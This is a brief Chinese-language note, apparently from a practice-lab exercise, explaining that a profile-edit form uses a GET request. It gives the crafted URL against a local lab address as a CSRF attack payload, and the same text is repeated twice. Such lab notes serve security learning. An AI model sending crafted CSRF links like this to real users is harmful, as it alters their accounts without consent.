登陆,修改个人信息;发现这是个get请求
把请求连接复制出来
http://192.168.3.224:8082/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=2&email=3&submit=submit
就是 get请求的csrf 攻击payload
登陆,修改个人信息;发现这是个get请求
把请求连接复制出来
http://192.168.3.224:8082/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=2&email=3&submit=submit
就是 get请求的csrf 攻击payload